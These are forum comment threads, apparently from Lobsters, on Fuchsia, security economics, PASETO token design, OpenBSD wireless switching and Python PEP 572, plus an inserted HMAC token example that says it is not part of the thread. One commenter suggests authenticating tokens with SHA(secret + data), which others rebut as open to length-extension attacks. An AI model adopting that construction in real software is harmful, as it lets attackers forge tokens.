1. 4

    Every time I read over coverage like this I wonder how Flutter will fit in. Are they targeting Dart on Flutter for cross-platform app development? Could Fuchsia become the new core for ChromeOS, Android, and WearOS?

    1. 2

      I believe (my opinion, based on observation) that Google wants to compete better in native app experiences to drive more business adoption, and ultimately, their play for Fuchsia is as a direct competitor to Windows and macOS. ChromeOS requires being managed by Google’s domain facilities. Fuchsia might support arbitrary management through ActiveDirectory, etc., making it a more appealing choice for larger corporations.

      The scary part in this plan is that the “ad team won.” That makes me nervous.

      Flutter/dart is the equivalent of Cocoa/Swift, and .NET/C#, but it happens to work on those other platforms too. So, “Hey native developers! Your porting efforts are lesser if you switch to flutter! And then they’ll work on Fuchsia, too! We’re attracting tons of new interest. You can be one of the first native apps that works on Fuchsia, and maybe be a launch partner.”

    1. 6

      None of these tactics remove or prevent vulnerabilities, and would therefore be rejected by a “defense’s job is to make sure there are no vulnerabilities for the attackers to find” approach. However, these are all incredibly valuable activities for security teams, and lower the expected value of trying to attack a system.

      I’m not convinced. “Perfect” is an overstatement for the sake of simplicity, but effective security measures need to be exponentially more costly to bypass than they are to implement, because attackers have much greater resources than defenders. IME all of the examples this page gives are too costly to be worth it, almost all of the time: privilege separation, asset depreciation, exploit mitigation and detection are all very costly to implement while representing only modest barriers to skilled attackers. Limited resources would be better expended on “perfect” security measures; someone who expended the same amount of effort while following the truism and focusing on eliminating vulnerabilities entirely would end up with a more secure system.

      1. 2

        You would end up with a more secure system from attackers with less resources. For example, you can make your system secure to all common methods used by script kiddies but what happens when a state-level actor is attacking your system? In this case and as your threats get more advanced I agree with the article. In higher levels of threats it becomes a problem of economics.

        1. 2

          You would end up with a more secure system from attackers with less resources. For example, you can make your system secure to all common methods used by script kiddies but what happens when a state-level actor is attacking your system?

          I think just the opposite actually. The attitude proposed by the article would lead you to implement things that defended against common methods used by script kiddies (i.e. cheap attacks) but did nothing against funded corporate rivals. Whereas following the truism would lead you to make changes that would protect against all attackers.

          1. 4

            The attitude proposed by the article would lead you to implement things that defended against common methods used by script kiddies (i.e. cheap attacks) but did nothing against funded corporate rivals.

            That’s not what I understand from this article. The attitude proposed by the article should, IMO, lead you to think of the threat model of the system you’re trying to protect.

            If it’s your friend’s blog, you (probably) shouldn’t have to consider state actors. If it’s a stock exchange, you should. If you’re Facebook or Amazon, not the same as lobsters or your sister’s bike repair shop. If you’re a politically exposed individual, exploiting your home automation raspberry pi might be worth more than exploiting the same system belonging to someone who is not a public figure at all.

            Besides that, I disagree that all examples are too costly to be worth it. Hashing passwords is always worth it, or at least I can’t think of a case where it wouldn’t be.

            To summarize with an analogy, I don’t take the exact same care of my bag when my laptop (or other valuables) are in it than when it only contains my water bottle, and Edward Snowden should care more about the software he uses than the ones I use.

            Overall I really like the way of thinking presented by the author!

            1. 2

              Whereas following the truism would lead you to make changes that would protect against all attackers.

              Or mess with your sense of priority such that all vulnerabilities are equally important so “let’s just go for the easier mitigations”, rather than evaluating based on the cost of the attack itself.

              1. 1

                If you’re thinking about “mitigations” you’re already in the wrong mentality, the one the truism exists to protect you against.

                1. 1

                  It’s important to acknowledge that it’s somewhat counterintuitive to think about the actual parties attempting to crack your defenses. It requires more mental work, in a world where people assume they can get all the info they need just by reading their codebase & judging it on its own merits. It requires methodical, needs-based analysis.

                  The present mentality is not a pernicious truism; it’s an attractive fallacy.

          2. 2

            IME all of the examples this page gives are too costly to be worth it, almost all of the time: privilege separation, asset depreciation, exploit mitigation and detection are all very costly to implement while representing only modest barriers to skilled attackers.

            How do you figure it’s too costly? If anything, all these things are getting much easier, as they become primitive to deployment environments, and frameworks. Additionally, there are services out there that scan dep. vulnerabilities if you give them a Gemfile, or access to your repo.

            Limited resources would be better expended on “perfect” security measures; someone who expended the same amount of effort while following the truism and focusing on eliminating vulnerabilities entirely would end up with a more secure system.

            Perfect it all you want. The weakest link is still an employee who is hung over and provides their credentials to a fake GMail login page. (Or the equivalent fuck up.) If anything, what’s costly is keeping on your employees to not take shortcuts, and on staying alert to missing access cards, rogue network devices in the office, badge surfing, and that they don’t leave their assets lying around.

            1. 1

              If anything, all these things are getting much easier, as they become primitive to deployment environments, and frameworks.

              I’d frame that as: deployment environments are increasingly set up so that everyone pays the costs.

              The weakest link is still an employee who is hung over and provides their credentials to a fake GMail login page. (Or the equivalent fuck up)

              So fix that, with a real security measure like hardware tokens. Thinking in terms of costs to attackers doesn’t make that any easier; indeed it would make you more likely to ignore this kind of attack on the grounds that fake domains are costly.

          1. 5

            Is this token local or public? local: shared-key authenticated encryption, public: public-key digital signatures.

            If someone doesn’t know whether to pick between encrypting or signing or tagging [1] a token, it seems that asking whether the token is local or public could only confuse them. SWEs implementing their own encryption might be foolish, but not understanding the primitive cryptographic operations you can utilize seems to err in the other end of the possible delineations between researchers and practitioners.

            1. since this one is slightly less commonly known — https://en.wikipedia.org/wiki/Message_authentication_code

            1. 1

              If it’s local, you get authenticated encryption. No other choices.

              If it’s public (i.e. the token is signed by one party and verified by another), you get digital signatures.

              That’s the only choice that needs to be made.

              1. 4

                That misses quite a few use-cases, no? Most importantly, tagging, where I don’t need asymmetric signatures and I don’t need encryption, but I want to give you a token you can read but not modify before you pass it back to me.

                Also, why does “local” mean “authenticated encryption”? And “public” mean “digital signatures”? I might be getting dense towards the end of a long week, but the linguistic intuition seems non-obvious.

                1. 3

                  Most importantly, tagging, where I don’t need asymmetric signatures and I don’t need encryption, but I want to give you a token you can read but not modify before you pass it back to me.

                  If you want unencrypted-but-authenticated tokens, stick the raw data in the unencrypted footer. Strictly speaking, your options are AEAD or Ed25519.

                  Also, why does “local” mean “authenticated encryption”? And “public” mean “digital signatures”?

                  Local means local to a system. The issuer is the verifier.

                  Public means it’s not local to a system, it’s going to be transmitted over the public Internet. The issuer is a different entity than the verifier. (It doesn’t make sense to use public-key cryptography for a purely-local use case.)

                  1. 2

                    If you want unencrypted-but-authenticated tokens, stick the raw data in the unencrypted footer.

                    So instead of buttons and levers, there’s more than one place I can stick my data?

                    The issuer is the verifier.

                    The word for that use case is “symmetric”.

                    Public means it’s not local to a system, it’s going to be transmitted over the public Internet.

                    And if the data is public, but the token verification is local (i.e. symmetric), then you stick it in the unencrypted footer. Got it.

                    Hope you don’t take it personally if I stick with { data, tag: SHA(secret + data) } and call it a day ;)

                    1. 7

                      { data, tag: SHA(secret + data) }

                      I hope you don’t stick with that, since I can add my own data and produce a new, but valid SHA, via a length extension attack, no?

                      1. 4

                        Just to really drive this home @anfedorov - the tldr from @apg’s link:

                        HMAC is the real solution. HMAC is designed for securely hashing data with a secret key.

                        1. 1

                          False! HMAC was designed for securely tagging data with poorly constructed hash functions. Sorry not sorry for being pedantic, but apg should really know better than trying to nitpick me ;)

                        2. 1
                          1. 2

                            You didn’t specify SHA3, and are replying months later….
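The tagging construction the exchange above converges on, as an added example that is not part of any comment in the thread: an unencrypted-but-authenticated token of the form { data, tag } where the tag is HMAC-SHA256 over a canonical serialization of the data, verified with a constant-time comparison. The key, the payload and the token layout are constructed for this illustration.

```python
import hashlib
import hmac
import json

# Constructed demo key for this example only; a real issuer loads its key
# from a secret store and never embeds it in source.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"


def canonical_bytes(data: dict) -> bytes:
    """Serialize the payload deterministically so issuer and verifier tag
    exactly the same bytes (sorted keys, no whitespace)."""
    return json.dumps(data, sort_keys=True, separators=(",", ":")).encode("utf-8")


def issue_token(data: dict, key: bytes = SECRET_KEY) -> dict:
    """Return {data, tag} where tag = HMAC-SHA256(key, canonical JSON of data).

    The data stays readable by the holder (the 'unencrypted footer' case from
    the thread); only the issuer, who holds the key, can produce a valid tag.
    """
    tag = hmac.new(key, canonical_bytes(data), hashlib.sha256).hexdigest()
    return {"data": data, "tag": tag}


def verify_token(token: dict, key: bytes = SECRET_KEY) -> bool:
    """Recompute the tag over the presented data and compare it in constant
    time. Any structural defect (missing field, non-serializable data) is a
    verification failure rather than an exception the caller must remember
    to handle."""
    try:
        expected = hmac.new(key, canonical_bytes(token["data"]), hashlib.sha256).hexdigest()
        return hmac.compare_digest(expected, str(token["tag"]))
    except (KeyError, TypeError, ValueError):
        return False


def demo() -> tuple:
    """Issue a token, then check a genuine copy, a copy whose data was edited
    by the holder, and a copy checked under a different key."""
    token = issue_token({"user": "alice", "role": "reader"})
    tampered = dict(token)
    tampered["data"] = {"user": "alice", "role": "admin"}
    return (
        verify_token(token),                      # genuine: True
        verify_token(tampered),                   # edited data, old tag: False
        verify_token(token, b"some-other-key"),   # wrong key: False
    )


if __name__ == "__main__":
    print(demo())
```

The canonical serialization step is what makes the scheme usable across two code paths: if the issuer tags one byte layout and the verifier recomputes over another (different key order, different whitespace), every genuine token fails. HMAC keyed with the secret, rather than a bare hash of secret + data, is the construction the thread recommends because a keyed MAC does not let a holder derive a valid tag for extended or altered data from an existing one.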

              1. 7

                This is a great usability improvement. Thank you Peter Hessler :)

                That said, it’s still a little bit sad that this is only just being introduced in 2018.

                1. 34

                  That said, it’s still a little bit sad that this is only just being introduced in 2018.

                  Technically - OpenBSD has had various toolings (1, 2, 3 and others) to do this very task for quite a long time. But none of them were considered the correct approach.

                  Also, this is something that’s pretty unique to OpenBSD IMO. The end result is the same as with other systems.. sure. But this is unique among the unix world.

                  Q: What’s the difference?

                  Glad I asked! This is entirely contained within the base system and requires no tools beyond ifconfig!

                  Linux has ip, iw, networkmanager, iwconfig..(likely others)… and they are all using some weird combo of wpa_supplicant.. autogen’d text files.. and likely other things.

                  Have you ever tried to manually configure wireless on linux? It’s a nightmare. Always has been.

                  NetworkManager does a really good job of making it feel like there isn’t a kludge going on behind the scenes.. It does this by gluing all the various tools together so you don’t have to know about them. IMO this is what happens when you “get it done now” vs “do it right”.

                  With great simplicity comes great security:

                  NetworkManager@6c3174f6e0cdb3e0c61ab07eb244c1a6e033ff6e:

                  github.com/AlDanial/cloc v 1.74  T=28.62 s (48.2 files/s, 45506.1 lines/s)
                  --------------------------------------------------------------------------------
                  Language                      files          blank        comment           code
                  --------------------------------------------------------------------------------
                  PO File                          66         125328         161976         457879
                  C                               541          71112          66531         321839
                  C/C++ Header                    528          10430          15928          34422
                  XML                              59           1406           2307           6692
                  make                              6            885            229           5009
                  Python                           40           1189           1128           4597
                  NAnt script                      65            626              0           3968
                  m4                                8            237            123           1958
                  Lua                              11            212            453           1314
                  Bourne Shell                     21            232            238           1115
                  XSLT                              5             65              3            929
                  Perl                              4            166            243            480
                  Bourne Again Shell               11             30             35            241
                  C++                               4             62            121            178
                  YAML                              4             12              6            161
                  JavaScript                        1             33             21            130
                  Ruby                              3             39             92            110
                  Lisp                              2             15             24             23
                  --------------------------------------------------------------------------------
                  SUM:                           1379         212079         249458         841045
                  --------------------------------------------------------------------------------
                  

                  VS

                  ifconfig@1.368:

                  github.com/AlDanial/cloc v 1.74  T=0.12 s (32.2 files/s, 58201.7 lines/s)
                  -------------------------------------------------------------------------------
                  Language                     files          blank        comment           code
                  -------------------------------------------------------------------------------
                  C                                2           1009            345           5784
                  C/C++ Header                     1              7             16             58
                  make                             1              3              1              6
                  -------------------------------------------------------------------------------
                  SUM:                             4           1019            362           5848
                  -------------------------------------------------------------------------------
                  

                  Anyway - I guess my point is this:

                  • Almost every OS achieves this goal.. sure.
                  • Most have had this feature for quite some time.. agree (Including OpenBSD!).
                  • None of them have it implemented as simply and well-thought-out as OpenBSD.
                  1. 5

                    Have you ever tried to manually configure wireless on linux? It’s a nightmare. Always has been.

                    No. The Linux’s I use come with an out-of-the-box experience that makes wireless as easy as clicking a box, clicking a name, typing in the password, it works, and it reconnects when nearby. They have been like that since I bought an Ubuntu-specific Dell a long time ago. They knew it was a critical feature that needed to work easily with no effort with some doing that upon installation so parts of the install could be downloaded over WiFi. Then, they did whatever they had to do in their constraints (time/talent/available code) to get it done.

                    And then I was able to use it with the only breaks being wireless driver issues that had answers on Q&A sites. Although that was annoying, I didn’t have to think about something critical I shouldn’t have to think about. Great product development in action for an audience that has other things to do than screw around with half-built wireless services. That’s a compliment about what I used rather than a jab at OpenBSD’s which I didn’t use. I’m merely saying quite a few of us appreciate stuff that saves us time once or many times. If common and critical, adoption can go up if it’s a solved problem with minimal intervention out of the box.

                    That said, props to your project member who solved the problem with a minimally-complex solution in terms of code and dependencies. I’m sure that was hard work. I also appreciate you illustrating that for us with your comparisons. The difference is almost comical in the work people put in with very different talents, goals and constraints. And m4 isn’t gone yet. (sighs)

                    1. 7

                      No. The Linux’s I use come with an out-of-the-box experience that makes wireless as easy as clicking a box, clicking a name, typing in the password, it works, and it reconnects when nearby.

                      And then something goes wrong in the fragile mess of misfeatures, and someone has to dig in and debug, or a new feature comes along and someone has to understand the stack of hacks to understand it, before it can be added. There’s something to be said for a system that can be understood.

                      1. 4

                        There is something to be said for a system to be understood. I totally agree. I also think there’s something to be said for a reliable, more-secure system that can be effortlessly used by hundreds of millions of people. A slice of them will probably do things that were worth the effort. The utilitarian in me says make it easy for them to get connected. The pragmatist also says highly-usable, effortless experience leads to more benefits in terms of contributions, donations, and/or business models. These seemingly-contradicting philosophies overlap in this case. I think end justifies the means here. One can always refactor the cruddy code later if it’s just one component in the system with a decent API.

                        1. 3

                          One can always refactor the cruddy code later if it’s just one component in the system with a decent API.

                          The problem isn’t the code, it’s the system that it’s participating in.

                          1. 2

                            One can always refactor the cruddy code later if it’s just one component in the system with a decent API.

                            This just leads to systemd, and more misfeatures…

                            1. 3

                              There are Linuxes without systemd. Even those that had it didn’t before they got massive adoption/impact/money. So, it doesn’t naturally lead to it. Just bad decision-making in groups controlling popular OS’s from what I can tell. Then, there’s also all the good stuff that comes with their philosophy that strict OS’s like OpenBSD haven’t achieved. The Linux server market, cloud, desktops, embedded, and Android are worth the drawbacks if assessing by benefits gained by many parties.

                              Personally, I’m fine with multiple types of OS being around. I like and promote both. As usual, I’m just gonna call out anyone saying nobody can critique an option or someone else saying it’s inherently better than all alternatives. Those positions are BS. These things are highly contextual.

                      2. 1

                        This is really great. I wish all other projects could do that, preferring elegance to throwing code at the wall, but sometimes life really takes its toll and we cave and just make a Frankenstein to get shit done.

                        I really appreciate all the works by OpenBSD folks. Do you have any idea how other *BSD’s deal with the wireless?

                        1. 1

                          Do you have any idea how other *BSD’s deal with the wireless?

                          I don’t - sorry :D

                      3. 3

                        What’s really sad is that the security of other operating systems can’t keep up despite having more manpower.

                        1. 2

                          It’s almost like if you prioritize the stuff that truly matters, and be willing to accept a little bit of UX inconvenience, you might happen upon a formula that produces reliable software? Who would have thought?

                          1. 2

                            That’s what I told OpenBSD people. They kept on a poorly-marketed monolith in unsafe language without the methods from CompSci that were knocking out whole classes of errors. They kept having preventable bugs and adoption blockers. Apparently, the other OS developers have similarly, hard-to-change habits and preferences with less focus on predictable, well-documented, robust behavior.

                          2. 1

                            I think this is just a matter of what you think matters. There’s no sadness here. The ability to trade off security for features and vice versa is good. It lets us accept the level of risk we like.

                            On the other hand, it’s really sad, for instance, that OpenBSD has had so many public security flaws compared to my kernel ;P

                            1. 1

                              On the other hand, it’s really sad, for instance, that OpenBSD has had so many public security flaws compared to my kernel ;P

                              What’s your kernel?

                              1. 2

                                It’s a joke. Mine is a null kernel. It has zero code, so no features, so no security flaws. Just like OpenBSD has fewer features and fewer known security flaws than Linux, mine has fewer features but no security flaws.

                                Unlike OpenBSD, mine is actually immune to Meltdown and Spectre.

                                1. 1

                                  Not having public flaws doesn’t mean you don’t have flaws. Could mean not enough people are even considering checking for flaws. ;)

                                  1. 1

                                    Oh OK lol.

                            2. 0

                              That said, it’s still a little bit sad that this is only just being introduced in 2018.

                              Would you like to clarify what you mean by this comment? Cause right now my interpretation of it is that you feel entitled to have complicated features supported in operating systems developed by (largely unpaid) volunteers.

                              1. 11

                                I’m getting a bit tired of every complaint and remark being reduced to entitlement. Yes, I know that there is a lot of unjustified entitlement in the world, and it is rampant in the open source world, but I don’t feel entitled to anything in free or open source software space. As someone trying to write software in my spare time, I understand how hard it is to find spare time for any non-trivial task when it’s not your job.

                                Though I am not a heavy user, I think OpenBSD is an impressive piece of software, with a lot of thought and effort put into the design and robustness of the implementation.

                                I just think it’s somewhat disheartening that something this common (switching wireless networks) was not possible without manual action (rewriting a configuration file, or swapping configuration files, and restarting the network interface) every time you needed to switch or moved from home to the office.

                                Whether you feel like this is me lamenting the fact that there are so few contributors to important open source projects, me lamenting the fact that it is so hard to make time to work on said project, or me being an entitled prick asking for features on software I don’t pay for (in money or in time/effort) is entirely your business.

                                1. 5

                                  Just for the record I didn’t think you sounded entitled. The rest of the comment thread got weirdly sanctimonious for some reason.

                                  Volunteers can work on whatever they want, and anybody’s free to comment on their work. Other operating systems have had the ability to switch wifi networks now for a long time, so it’s fair to call that out. And then Peter went and did something about it which is great.

                                  Previously I’ve been using http://ports.su/net/wireless for wifi switching on my obsd laptop, but will use the new built-in feature when I upgrade the machine.

                                  Some of the delay for the feature may be because the OS, while very capable, doesn’t seem designed to preemptively do things on the user’s behalf. Rather the idea seems to be that the user knows what’s best and will ask the OS to do things. For instance when I dock or undock my machine from an external monitor it won’t automatically switch to using the display. I have a set of dock/undock scripts for that. I appreciate the simple “manual transmission” design of the whole thing. The new wifi feature seems to be in a similar spirit, where you rank each network’s desirability and the OS tries in that order.

                                  1. 2

                                    Interesting, I didn’t know about that too. I used my own bash script to juggle config files and restart the interface, but the new support in ifconfig itself is much easier.

                                    I think the desire for OpenBSD to not do things without explicit user intent are certainly part of why this wasn’t added before, as well as limited use as a laptop OS until relatively recently.

                                  2. 2

                                    Thanks for taking the time to respond.

                                    To be clear, I don’t believe you’re some sort of entitled prick – I don’t even know you. But, I do care that people aren’t berating developers with: “That’s great, but ____” comments. Let’s support each other, instead of feigning gratitude. It wasn’t clear if that’s what you were doing, hence, my request for clarification.

                                    That being said, my comment was poorly worded, and implied a belief that you were on the wrong side of that. That was unfair, and I apologize.

                                    I just think it’s somewhat disheartening that something this common (switching wireless networks) was not possible without manual action (rewriting a configuration file, or swapping configuration files, and restarting the network interface) every time you needed to switch or moved from home to the office.

                                    Well, I’m just not going to touch this…. :eyeroll:

                                    1. 1

                                      I apologize if my response was a little bit snide. I’ve been reading a lot of online commentary that chunks pretty much everything into whatever people perceive as wrong with society (most commonly: racism, sexism, or millennial entitlement - I know these are real and important issues, but not everything needs to be about them). I read your remark in that context and may have been a little harsh.

                                      Regarding the last segment - how WiFi switching worked before - there may have been better ways to do this, but I’m not sure they were part of the default install. When I needed this functionality on OpenBSD, I basically wrote a bash script to do these steps for me on demand, and that worked alright for me. It may not have been the best way, so my view of the OpenBSD WiFi laptop landscape prior to the work of Peter may not be entirely appropriate or accurate.

                                    2. 1

                                      I just think it’s somewhat disheartening that something this common (switching wireless networks) was not possible without manual action (rewriting a configuration file, or swapping configuration files, and restarting the network interface) every time you needed to switch or moved from home to the office.

                                      I’m more blunt here that leaving that to be true in a world with ubiquitous WiFi was a bad idea if they wanted more adoption and donations from the market segment that wanted good, out-of-the-box support for WiFi. If they didn’t want that, then it might have been a good choice to ignore it for so long to focus on other things. It all depends on what their goals were. Since we don’t know them, I’ll at least say that it was bad, neutral, or good depending on certain conditions like with anything else. The core userbase was probably OK with whatever they had, though.

                                    3. 3

                                      First, both free speech and hacker culture say that person can gripe about what they want. They’re sharing ideas online that someone might agree with or act on. We have a diverse audience, too.

                                      Second, the project itself has developers that write cocky stuff about their system, mock the other systems, talk that one time about how they expect more people to be paying them with donations, more recently talk about doing things like a hypervisor for adoption, and so on. Any group doing any of that deserves no exception to criticism or mockery by users or potential users. It’s why I slammed them hard in critiques, only toning it down for the nice ones I met. People liking critiques of other projects or wanting adoption/donations should definitely see others’ critiques of their projects, esp. if it’s adoption/donation blockers. I mean, Macs had a seamless experience called Rendezvous or something in 2002. If I’m reading the thread right, that was 16 years before OpenBSD something similar they wanted to make official. That OpenBSD members are always bragging when they’re ahead of other OS’s on something is why I’m mentioning it. Equal treatment isn’t always nice.

                                      “But, I do care that people aren’t berating developers with: “That’s great, but ____” comments. Let’s support each other, instead of feigning gratitude. It wasn’t clear if that’s what you were doing, hence, my request for clarification.”

                                      I did want to point out that we’ve had lots of OpenBSD-related submissions and comments with snarky remarks about what other developers or projects were doing. I at least don’t recall you trying to shut them down with counterpoints assessing their civility or positivity toward other projects (say NetBSD or Linux). Seems a little inconsistent. My memory is broken, though. So, are you going to be countering every negative remark OpenBSD developers or supporters make about projects with different goals, telling them to be positive and supportive only? A general rule of yours? Or are you giving them a pass for some reason but applying the rule to critics of OpenBSD choices?

                                      1. 1

                                        I at least don’t recall you trying to shut them down with counterpoints assessing their civility or positivity toward other projects (say NetBSD or Linux). Seems a little inconsistent.

                                        I’m not the Internet Comment Police, but you seem to think you are for some reason… Consider this particular instance “me griping about what I want.”

                                        Or are you giving them a pass for some reason but applying the rule to critics of OpenBSD choices?

                                        This wasn’t about OpenBSD at all. This started out as a request for clarification on the intent of an ambiguous comment that seemed entitled. There seems to be a lot of that happening today, and a lot of people defending it for whatever reason, which is even worse.

                                        1. 1

                                          I’m not the Internet Comment Police

                                          Your comments came off that way to me between the original and follow-ups. As far as it not being about OpenBSD, it’s in a thread on it with someone griping it lacked something they wanted. The OpenBSD members griping about third party projects not having something they wanted to see more of typically got no comment from you. The inconsistency remains. I’m writing it off as you’re just a fan of their style of thinking on code, quality, or something.

                                      2. 2

                                        i think he’s sad that there haven’t been enough volunteers to make it happen sooner

                                        1. 2

                                          That’s certainly one possibility, but not how I took it initially, and why I asked for clarification. I’ve seen too many people over the years attempt to disguise their entitlement by saying “thanks.”

                                          I’d have liked to see this comment worded as:

                                          This is a great usability improvement. Thank you Peter Hessler :) It’s a shame that there isn’t a better way to bring these important usability features to OpenBSD faster. What is the best way to help make that happen? Donations to the OpenBSD Foundation? Sponsor the work directly? Something else?

                                          Now, it’s also possible that the OP has ties to OpenBSD, and the comment was self-deprecating. But, one can’t infer that from the information we see without investigating who the OP is, and their affiliations…

                                          1. 0

                                            one can’t infer anything beyond what they said

                                            1. 2

                                              I’m not sure you understand what infer means. One certainly can infer meaning from a comment, based on previous actions, comments, etc.

                                              My point remains: It’d be nice if the OP would clarify what they mean. My interpretation of the OP’s comment is just as likely as your interpretation. My interpretation is damaging to the morale of existing volunteer contributors to FOSS, and gives potential contributors to FOSS reasons to not contribute altogether. I don’t know about you, but I want to encourage people to contribute to FOSS, as doing so moves us closer to a free and open society. And, that alone, is the reason I’m even bothering to continue responding to this thread…

                                              1. 1

                                                he said “it’s sad.” that’s all we know. the leap is that this means “entitlement.”

                                                1. 1

                                                  “It’s pretty sad that it took someone else so long to prioritize work I think is necessary.”

                                                  I think it’s pretty easy to take what was written and read it this way. But maybe my glass is half empty today.

                                                2. 0

                                                  One can infer based on a comment, but the inference will most likely be dimwitted bullshit.

                                                  Without the magic trifecta of body language, vocal intonation, and facial expression us monkeys are just shit at picking up on any extra meaning. So take the comment at face value.

                                                  It expresses gratitude, it focuses on a specific recipient, and it lauds the feature. After, it regrets that it couldn’t/didn’t happen earlier.

                                                  There’s no hidden meaning here, and if the commenter intended a hidden meaning he’s a doofus too, because there’s no unicode character for those. U+F089A6CDCE ZERO WIDTH SARCASTIC FUCK YOU MARK notwithstanding.

                                                  At some point we all need to stop insisting that we have near-telepathic powers, especially outside of meatspace.

                                                  1. 2

                                                    So, what you’re saying is that I can write anything I want, and since you can’t see or hear other clues, there’s no way you can downvote (in good faith) this comment as trolling?

                                                    Not sure text works that way…

                                            2. 1

                                              They had the solution to do it all the time, but it wasn’t invented here, so it’s bad.

                                        1. -1

                                          As one insignificant user of this language, please stop adding these tiny edge case syntax variations and do something about performance. But I am one small insignificant user …

                                          1. 56

                                            This is exactly the attitude that leads to maintainers’ burnout.

                                            Do realize this:

                                            • Adding syntax variations is not done at the expense of performance, different volunteers are working on what’s more interesting to them.
                                            • Python is not a product, and you’re not a paying customer, you don’t get to say “do this instead of that” because none of the volunteer maintainers owes you to produce a language for you. Just walking by and telling people what to do with their project is at the very least impolite.
                                            • If you want something to happen in an open source project, volunteer to do it.

                                            (None of this is aimed at you personally, I don’t know who you are. I’m dissecting an attitude that you’ve voiced, it’s just all too common.)

                                            1. 23

                                              Python is not a product, and you’re not a paying customer, you don’t get to say “do this instead of that” because none of the volunteer maintainers owes you to produce a language for you. Just walking by and telling people what to do with their project is at the very least impolite.

                                              I agree with the general direction of your post, but Python is a product and it is marketed to people, through the foundation and advocacy. It’s not a commercial product (though, given the widespread industry usage, you could argue it somewhat is). It’s reasonable of users to form expectations.

                                              Where it goes wrong is when individual users claim that this also means that they need to be consulted or their consultation will steer the project to the better. http://www.ftrain.com/wwic.html has an interesting investigation of that.

                                              1. 2

                                                Where it goes wrong is when users claim that this also means that they need to be consulted or their consultation will steer the project to the better.

                                                Wait, who is the product being built for, if not the user? You can say I am not a significant user, so my opinion is not important, as opposed to say Google which drove Python development for a while before they focused on other things, but as a collective, users’ opinions should matter. Otherwise, it’s just a hobby.

                                                1. 5

                                                  Sorry, I clarified the post: “individual users”. There must be a consultation process and some way of participation. RFCs or PEPs provide that.

                                                  Yet, what we regularly see is people claiming how the product would be a better place if we listened to them (that, one person we never met). Or, alternatively, people that just don’t want to accept a loss in a long-running debate.

                                                  I don’t know if that helps clarifying, it’s a topic for huge articles.

                                                  1. 3

                                                    I often find what people end up focusing on - like this PEP - is bikeshedding. It’s what folks can have an opinion on after not enough sleep, a zillion other things to do, and not enough in-depth knowledge. Heck, I could have an opinion on it. As opposed to hard problems like performance, where I would not know where to start, much less contribute any code, but which would actually help me and, I suspect, many other folks, who are, with some sighing, migrating their code to Julia, or, like me, gnashing their teeth at the ugliness of Cython.

                                                    1. 4

                                                      Yeah, it’s that kind of thing. I take a harsh, but well-structured opinion any time and those people are extremely important. What annoys me is people following a tweet-sized mantra to the end, very much showing along the path that they have not looked at what is all involved or who would benefit, or not knowing when to let go of a debate.

                                              2. 17

                                                Adding syntax variations is not done at the expense of performance, different volunteers are working on what’s more interesting to them.

                                                Regrettably, a lot of languages and ecosystems suffer greatly from the incoherence that this sort of permissive attitude creates.

                                                Software is just as much about what gets left out as what gets put in, and just because Jane Smith and John Doe have a pet feature they are excited about doesn’t mean they should automatically be embraced when there are more important things on fire.

                                                1. 8

                                                  the incoherence that this sort of permissive attitude creates

                                                  The Haskell community would’ve just thrown PEP 572 behind {-# LANGUAGE Colonoscopy #-} and been done with it.

                                                  Sure, this doesn’t get us out of jail free with regard to incoherence, but it kicks down the problem from the language to the projects that choose to opt-in.

                                                  1. 2

                                                    I find it hard to see this as a good thing. For me, it mostly highlights why Haskell is a one-implementation language… er, 2 ^ 227 languages, if ghc --supported-extensions | wc -l is to be taken literally. Of course, some of those extensions are much more popular than others, but it really slows down someone trying to learn “real world” Haskell by reading library code.

                                                    1. 2

                                                      Of course, some of those extensions are much more popular than others

                                                      Yeah, this is a pretty interesting question! I threw some plots together that might help explore it, but it’s not super conclusive. As with most things here, I think a lot of this boils down to personal preference. Have a look:

                                                      https://gist.github.com/atondwal/ee869b951b5cf9b6653f7deda0b7dbd8

                                                  2. 4

                                                    Yes. Exactly this. One of the things I value about Python is its syntactic clarity. It is the most decidedly un-clever programming language I’ve yet to encounter.

                                                    It is that way at the expense of performance, syntactic compactness, and probably some powerful features that could make me levitate and fly through the air unaided if I learned them, but I build infrastructure and day in, day out, Python gets me there secure in the knowledge that I can pick up anyone’s code and at the VERY LEAST understand what the language is doing 99% of the time.

                                                  3. 4

                                                    I find that “people working on what interests them” as opposed to taking a systematic survey of what use cases are most needed and prioritizing those is a hard problem in software projects, and I find it curious that people think this is not a problem to be solved for open source projects that are not single writer/single user hobby projects.

                                                    Python is interesting because it forms core infrastructure for many companies, so presumably they would be working on issues related to real use cases. Projects like numpy and Cython are examples of how people see an important need (performance) and go outside the official language to get something done.

                                                    “If you want something to happen in an open source project, volunteer to do it.” is also one of those hostile attitudes that I find curious. In a company with a paid product of course that attitude won’t fly, but I suspect that if an open source project had that attitude as a default, it would gradually lose users to a more responsive one.

                                                    As an example, I want to use this response from a library author as an example of a positive response that I value. This is a library I use often for a hobby. I raised an issue and the author put it in the backlog after understanding the use case. They may not get to it immediately. They may not get to it ever based on prioritization, but they listened and put it on the list.

                                                    Oddly enough, I see this kind of decent behavior more in the smaller projects (where I would not expect it) than in the larger ones. I think the larger ones with multiple vendors contributing turn into a “pay to play” situation. I don’t know if this is the ideal of open source, but it is an understandable outcome. I do wish the hostility would decrease though.

                                                    1. 12

                                                      Performance has never been a priority for Python and this probably won’t change, because as you said, there are alternatives if you want Python’s syntax with performance. Also its interoperability with C is okayish, and that means that the small niche of Python’s users that use it for performance critical operations that are not already supported by Numpy, Numba and so on will always be free to go that extra mile to optimize their code without much trouble compared to stuff like JNI.

                                                      If you want raw performance, stick to C/C++ or Rust.

                                                      1. 3

                                                        I also observe the same tendency of smaller projects being more responsive, but I think the issue is scale, not “pay to play”. Big projects get so much more issue reports but their “customer services” are not proportionally large, so I think big projects actually have less resource per issue.

                                                      2. 0

                                                        He did say “please”.

                                                      3. 7

                                                        please stop adding these tiny edge case syntax variations and do something about performance.

                                                        There’s a better forum, and approach, to raise this point.

                                                        1. 2

                                                          I guess you are saying my grass roots campaign to displace “Should Python have :=” with “gradual typing leading to improved performance” as a higher priority in the Python world is failing here. I guess you are right :)

                                                        2. 1

                                                          Have you tried Pypy? Have you tried running your code through Cython?

                                                          Have you read any of the zillion and one articles on improving your Python’s performance?

                                                          If the answer to any of these is “no” then IMO you lose the right to kvetch about Python’s performance.

                                                          And if Python really isn’t performant enough for you, why not use a language that’s closer to the metal like Rust or Go or C/C++?

                                                          1. 6

